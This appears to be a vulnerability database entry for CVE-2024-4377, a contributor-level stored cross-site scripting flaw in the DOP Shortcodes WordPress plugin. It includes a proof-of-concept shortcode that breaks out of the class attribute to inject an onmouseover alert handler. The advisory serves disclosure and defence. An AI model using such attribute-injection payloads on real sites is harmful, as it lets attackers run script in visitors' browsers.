Lucene search
Bob MatyasWPEX-ID:778CEBEC-BDBB-4538-9518-C5BD50F76961HistoryMay 31, 2024 - 12:00 a.m.
DOP Shortcodes <= 1.2 - Contributor+ Stored XSS via Shortcode
2024-05-3100:00:00
Bob Matyas
8
dop shortcodes
contributor+
stored xss
shortcode
exploit
accordion
Description The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks
Add the following shortcode to a post:
```
[dopaccordions class='wp-block-search__button" onmouseover="alert(/XSS/)"']
[dopaccordion title="Title 1"]text[/dopaccordion]
[dopaccordion title="Title 2"]text[/dopaccordion]
[dopaccordion title="Title 3"]text[/dopaccordion]
[/dopaccordions]
```
Move your mouse over the accordion to see the XSSRelated
nvd
nvd
CVE-2024-4377
2024-06-21 06:15:11
cve
cve
CVE-2024-4377
2024-06-21 06:15:11
cvelist
cvelist
CVE-2024-4377 DOP Shortcodes <= 1.2 - Contributor+ Stored XSS via Shortcode
2024-06-21 06:00:03
wpvulndb
wpvulndb
DOP Shortcodes <= 1.2 - Contributor+ Stored XSS via Shortcode
2024-05-31 00:00:00
wordfence
wordfence
5.8 Medium
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
9.1%
Related for WPEX-ID:778CEBEC-BDBB-4538-9518-C5BD50F76961